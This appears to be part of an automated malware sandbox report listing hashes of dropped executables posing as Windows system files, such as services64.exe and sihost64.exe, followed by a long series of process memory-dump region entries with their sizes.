  SHA256: 4c8b5fba12ebb583a444831e1a9759ef724f2d9f37c595e8afb22dbbdabf6bc8
  SHA512: c124240ded2271bc125e88ea6f4cc4625915809a13d66ebf8c32677436f043340b92bc50283835d212c9b40edcea5d458c2663a1d5be5038154b1eb1560628fe
-
C:\Users\Admin\services32.exe
  MD5: 55f246c4f670bddc2e1c6fab66fb9af8
  SHA1: b2737bf54e19008f7230830c987e9cc45ca9dba7
  SHA256: 4c8b5fba12ebb583a444831e1a9759ef724f2d9f37c595e8afb22dbbdabf6bc8
  SHA512: c124240ded2271bc125e88ea6f4cc4625915809a13d66ebf8c32677436f043340b92bc50283835d212c9b40edcea5d458c2663a1d5be5038154b1eb1560628fe
-
C:\Windows\System32\Microsoft\Libs\sihost64.exe
  MD5: ab0e8cd9d9374369b972868842a74471
  SHA1: d457b0f8ba1b3d1bd98fae16ea36a46ae04013a3
  SHA256: 873b123e6c5909c6a08f02649d7a47b172851f3b8e28a670a2ced2b4f8b036ea
  SHA512: 91d56a14ca18e316033cd938fbcdd48faa83ff8964185c2db9fbacdb200aab8c863c17c066f25e05afcd87746dc5909ecf59cfdb2920fb95528a5735d09c9afb
-
C:\Windows\System32\services64.exe
  MD5: f87ec0d92f1e1c57e281c3b7207264a4
  SHA1: 452ee705af24c36bb2235fc969dd122ede448e7b
  SHA256: 5e5c5c47ac45012b8fe6c40877d111d17b1ae3108fb1bb6ff4ab6e154d256f1c
  SHA512: 8e141c0a78dadafc241a70b1298fd35e223c18eaecceb7ea17bba05c4626e40e5c578757e0510a4db23f99dfb7439371f2ec6fe25252c50f4e3e89b30be37052
-
C:\Windows\system32\Microsoft\Libs\sihost64.exe
  MD5: ab0e8cd9d9374369b972868842a74471
  SHA1: d457b0f8ba1b3d1bd98fae16ea36a46ae04013a3
  SHA256: 873b123e6c5909c6a08f02649d7a47b172851f3b8e28a670a2ced2b4f8b036ea
  SHA512: 91d56a14ca18e316033cd938fbcdd48faa83ff8964185c2db9fbacdb200aab8c863c17c066f25e05afcd87746dc5909ecf59cfdb2920fb95528a5735d09c9afb
-
C:\Windows\system32\services64.exe
  MD5: f87ec0d92f1e1c57e281c3b7207264a4
  SHA1: 452ee705af24c36bb2235fc969dd122ede448e7b
  SHA256: 5e5c5c47ac45012b8fe6c40877d111d17b1ae3108fb1bb6ff4ab6e154d256f1c
  SHA512: 8e141c0a78dadafc241a70b1298fd35e223c18eaecceb7ea17bba05c4626e40e5c578757e0510a4db23f99dfb7439371f2ec6fe25252c50f4e3e89b30be37052
-
memory/316-286-0x0000000000000000-mapping.dmp
-
memory/436-565-0x0000017DCD476000-0x0000017DCD478000-memory.dmp
Filesize
8KB
-
memory/436-510-0x0000000000000000-mapping.dmp
-
memory/436-522-0x0000017DCD473000-0x0000017DCD475000-memory.dmp
Filesize
8KB
-
memory/436-521-0x0000017DCD470000-0x0000017DCD472000-memory.dmp
Filesize
8KB
-
memory/436-578-0x0000017DCD478000-0x0000017DCD479000-memory.dmp
Filesize
4KB
-
memory/596-366-0x0000000000000000-mapping.dmp
-
memory/672-268-0x0000000000000000-mapping.dmp
-
memory/692-121-0x0000000000000000-mapping.dmp
-
memory/752-258-0x0000029F254D8000-0x0000029F254D9000-memory.dmp
Filesize
4KB
-
memory/752-235-0x0000029F254D6000-0x0000029F254D8000-memory.dmp
Filesize
8KB
-
memory/752-234-0x0000029F254D3000-0x0000029F254D5000-memory.dmp
Filesize
8KB
-
memory/752-233-0x0000029F254D0000-0x0000029F254D2000-memory.dmp
Filesize
8KB
-
memory/752-217-0x0000000000000000-mapping.dmp
-
memory/876-293-0x00000297D6530000-0x00000297D6532000-memory.dmp
Filesize
8KB
-
memory/876-295-0x00000297D6533000-0x00000297D6535000-memory.dmp
Filesize
8KB
-
memory/876-297-0x00000297D6536000-0x00000297D6537000-memory.dmp
Filesize
4KB
-
memory/876-290-0x00000297D6180000-0x00000297D63A2000-memory.dmp
Filesize
2.1MB
-
memory/988-566-0x0000000140000000-0x0000000140786000-memory.dmp
Filesize
7.5MB
-
memory/988-625-0x000001D6D4060000-0x000001D6D4080000-memory.dmp
Filesize
128KB
-
memory/988-557-0x000000014030F3F8-mapping.dmp
-
memory/988-611-0x000001D6D4040000-0x000001D6D4060000-memory.dmp
Filesize
128KB
-
memory/1164-361-0x00000187F3D58000-0x00000187F3D59000-memory.dmp
Filesize
4KB
-
memory/1164-360-0x00000187F3D56000-0x00000187F3D58000-memory.dmp
Filesize
8KB
-
memory/1164-333-0x00000187F3D50000-0x00000187F3D52000-memory.dmp
Filesize
8KB
-
memory/1164-334-0x00000187F3D53000-0x00000187F3D55000-memory.dmp
Filesize
8KB
-
memory/1164-321-0x0000000000000000-mapping.dmp
-
memory/1172-276-0x0000000000000000-mapping.dmp
-
memory/1256-281-0x0000000000000000-mapping.dmp
-
memory/1324-380-0x0000000000000000-mapping.dmp
-
memory/2008-362-0x0000000000000000-mapping.dmp
-
memory/2028-186-0x0000029D42370000-0x0000029D42371000-memory.dmp
Filesize
4KB
-
memory/2028-167-0x0000000000000000-mapping.dmp
-
memory/2028-170-0x0000029D291D0000-0x0000029D291D2000-memory.dmp
Filesize
8KB
-
memory/2028-187-0x0000029D291D0000-0x0000029D291D2000-memory.dmp
Filesize
8KB
-
memory/2028-189-0x0000029D291D0000-0x0000029D291D2000-memory.dmp
Filesize
8KB
-
memory/2028-190-0x0000029D291D0000-0x0000029D291D2000-memory.dmp
Filesize
8KB
-
memory/2028-212-0x0000029D41856000-0x0000029D41858000-memory.dmp
Filesize
8KB
-
memory/2028-169-0x0000029D291D0000-0x0000029D291D2000-memory.dmp
Filesize
8KB
-
memory/2028-168-0x0000029D291D0000-0x0000029D291D2000-memory.dmp
Filesize
8KB
-
memory/2028-185-0x0000029D291D0000-0x0000029D291D2000-memory.dmp
Filesize
8KB
-
memory/2028-184-0x0000029D291D0000-0x0000029D291D2000-memory.dmp
Filesize
8KB
-
memory/2028-232-0x0000029D41858000-0x0000029D41859000-memory.dmp
Filesize
4KB
-
memory/2028-182-0x0000029D41853000-0x0000029D41855000-memory.dmp
Filesize
8KB
-
memory/2028-181-0x0000029D41850000-0x0000029D41852000-memory.dmp
Filesize
8KB
-
memory/2028-171-0x0000029D291D0000-0x0000029D291D2000-memory.dmp
Filesize
8KB
-
memory/2028-177-0x0000029D41820000-0x0000029D41821000-memory.dmp
Filesize
4KB
-
memory/2028-172-0x0000029D291D0000-0x0000029D291D2000-memory.dmp
Filesize
8KB
-
memory/2216-163-0x00000241F8D00000-0x00000241F8D02000-memory.dmp
Filesize
8KB
-
memory/2216-179-0x00000241F8DE6000-0x00000241F8DE7000-memory.dmp
Filesize
4KB
-
memory/2216-157-0x00000241F8D00000-0x00000241F8D02000-memory.dmp
Filesize
8KB
-
memory/2216-160-0x00000241F8D00000-0x00000241F8D02000-memory.dmp
Filesize
8KB
-
memory/2216-158-0x00000241F8D00000-0x00000241F8D02000-memory.dmp
Filesize
8KB
-
memory/2216-175-0x00000241F8DE0000-0x00000241F8DE2000-memory.dmp
Filesize
8KB
-
memory/2216-161-0x00000241F8D40000-0x00000241F8D4C000-memory.dmp
Filesize
48KB
-
memory/2216-174-0x00000241F8D00000-0x00000241F8D02000-memory.dmp
Filesize
8KB
-
memory/2216-173-0x00000241F8A80000-0x00000241F8A8F000-memory.dmp
Filesize
60KB
-
memory/2216-159-0x00000241F8D00000-0x00000241F8D02000-memory.dmp
Filesize
8KB
-
memory/2216-178-0x00000241F8DE3000-0x00000241F8DE5000-memory.dmp
Filesize
8KB
-
memory/2216-164-0x00000241F8D80000-0x00000241F8D81000-memory.dmp
Filesize
4KB
-
memory/2216-165-0x00000241F8D00000-0x00000241F8D02000-memory.dmp
Filesize
8KB
-
memory/2280-530-0x0000000000000000-mapping.dmp
-
memory/2296-127-0x0000000000000000-mapping.dmp
-
memory/2296-134-0x0000000000D60000-0x0000000000D61000-memory.dmp
Filesize
4KB
-
memory/2296-136-0x0000000005560000-0x0000000005561000-memory.dmp
Filesize
4KB
-
memory/2296-137-0x0000000005530000-0x0000000005531000-memory.dmp
Filesize
4KB
-
memory/2296-139-0x0000000005710000-0x0000000005711000-memory.dmp
Filesize
4KB
-
memory/2320-619-0x0000017CF8910000-0x0000017CF8916000-memory.dmp
Filesize
24KB
-
memory/2320-621-0x0000017CFAC63000-0x0000017CFAC65000-memory.dmp
Filesize
8KB
-
memory/2320-623-0x0000017CFAC66000-0x0000017CFAC67000-memory.dmp
Filesize
4KB
-
memory/2320-622-0x0000017CFAC60000-0x0000017CFAC62000-memory.dmp
Filesize
8KB
-
memory/2332-166-0x0000000000000000-mapping.dmp
-
memory/2956-180-0x0000000000000000-mapping.dmp
-
memory/2968-277-0x0000000000000000-mapping.dmp
-
memory/3012-124-0x0000000000000000-mapping.dmp
-
memory/3012-131-0x0000000000400000-0x0000000000EAE000-memory.dmp
Filesize
10.7MB
-
memory/3012-130-0x0000000000401000-0x0000000000403000-memory.dmp
Filesize
8KB
-
memory/3128-396-0x0000012C3CF00000-0x0000012C3CF02000-memory.dmp
Filesize
8KB
-
memory/3128-397-0x0000012C3CF03000-0x0000012C3CF05000-memory.dmp
Filesize
8KB
-
memory/3128-398-0x0000012C3CF06000-0x0000012C3CF07000-memory.dmp
Filesize
4KB
-
memory/3232-183-0x0000000000000000-mapping.dmp
-
memory/3272-148-0x00000000056C0000-0x00000000056C1000-memory.dmp
Filesize
4KB
-
memory/3272-150-0x0000000005680000-0x0000000005C86000-memory.dmp
Filesize
6.0MB
-
memory/3272-156-0x0000000006F30000-0x0000000006F31000-memory.dmp
Filesize
4KB
-
memory/3272-149-0x0000000005740000-0x0000000005741000-memory.dmp
Filesize
4KB
-
memory/3272-155-0x00000000063A0000-0x00000000063A1000-memory.dmp
Filesize
4KB
-
memory/3272-147-0x0000000005790000-0x0000000005791000-memory.dmp
Filesize
4KB
-
memory/3272-146-0x0000000003110000-0x0000000003111000-memory.dmp
Filesize
4KB
-
memory/3272-145-0x0000000005C90000-0x0000000005C91000-memory.dmp
Filesize
4KB
-
memory/3272-141-0x0000000000418D32-mapping.dmp
-
memory/3272-140-0x0000000000400000-0x0000000000420000-memory.dmp
Filesize
128KB
-
memory/3336-120-0x0000000003980000-0x0000000003981000-memory.dmp
Filesize
4KB
-
memory/3336-119-0x00000000779F0000-0x0000000077B7E000-memory.dmp
Filesize
1.6MB
-
memory/3336-132-0x00000000072F0000-0x00000000072F1000-memory.dmp
Filesize
4KB
-
memory/3336-129-0x0000000007700000-0x0000000007701000-memory.dmp
Filesize
4KB
-
memory/3336-117-0x0000000000E50000-0x0000000000E51000-memory.dmp
Filesize
4KB
-
memory/3456-299-0x0000022ECFE10000-0x0000022ECFE12000-memory.dmp
Filesize
8KB
-
memory/3456-301-0x0000022ECFE13000-0x0000022ECFE15000-memory.dmp
Filesize
8KB
-
memory/3456-331-0x0000022ECFE18000-0x0000022ECFE19000-memory.dmp
Filesize
4KB
-
memory/3456-303-0x0000022ECFE16000-0x0000022ECFE18000-memory.dmp
Filesize
8KB
-
memory/3456-269-0x0000000000000000-mapping.dmp
-
memory/3500-517-0x000002C099D90000-0x000002C099D92000-memory.dmp
Filesize
8KB
-
memory/3500-520-0x000002C099D96000-0x000002C099D97000-memory.dmp
Filesize
4KB
-
memory/3500-518-0x000002C099D93000-0x000002C099D95000-memory.dmp
Filesize
8KB
-
memory/3596-509-0x0000000000000000-mapping.dmp
-
memory/3756-499-0x000001FD64C26000-0x000001FD64C27000-memory.dmp
Filesize
4KB
-
memory/3756-498-0x000001FD64C23000-0x000001FD64C25000-memory.dmp
Filesize
8KB
-
memory/3756-496-0x000001FD4A7C0000-0x000001FD4A7C7000-memory.dmp
Filesize
28KB
-
memory/3756-497-0x000001FD64C20000-0x000001FD64C22000-memory.dmp
Filesize
8KB
-
memory/3764-400-0x0000000000000000-mapping.dmp
-
memory/3768-444-0x0000000000000000-mapping.dmp
-
memory/3768-484-0x000001C1F9AE3000-0x000001C1F9AE5000-memory.dmp
Filesize
8KB
-
memory/3768-486-0x000001C1F9AE6000-0x000001C1F9AE8000-memory.dmp
Filesize
8KB
-
memory/3768-483-0x000001C1F9AE0000-0x000001C1F9AE2000-memory.dmp
Filesize
8KB
-
memory/3768-485-0x000001C1F9AE8000-0x000001C1F9AE9000-memory.dmp
Filesize
4KB
-
memory/3908-447-0x000002331BFD8000-0x000002331BFD9000-memory.dmp
Filesize
4KB
-
memory/3908-446-0x000002331BFD6000-0x000002331BFD8000-memory.dmp
Filesize
8KB
-
memory/3908-401-0x000002331BFD3000-0x000002331BFD5000-memory.dmp
Filesize
8KB
-
memory/3908-399-0x000002331BFD0000-0x000002331BFD2000-memory.dmp
Filesize
8KB
-
memory/3908-381-0x0000000000000000-mapping.dmp
-
memory/4048-580-0x0000025BBF613000-0x0000025BBF615000-memory.dmp
Filesize
8KB
-
memory/4048-602-0x0000025BBF616000-0x0000025BBF618000-memory.dmp
Filesize
8KB
-
memory/4048-612-0x0000025BBF618000-0x0000025BBF619000-memory.dmp
Filesize
4KB
-
memory/4048-579-0x0000025BBF610000-0x0000025BBF612000-memory.dmp
Filesize
8KB
-
memory/4048-570-0x0000000000000000-mapping.dmp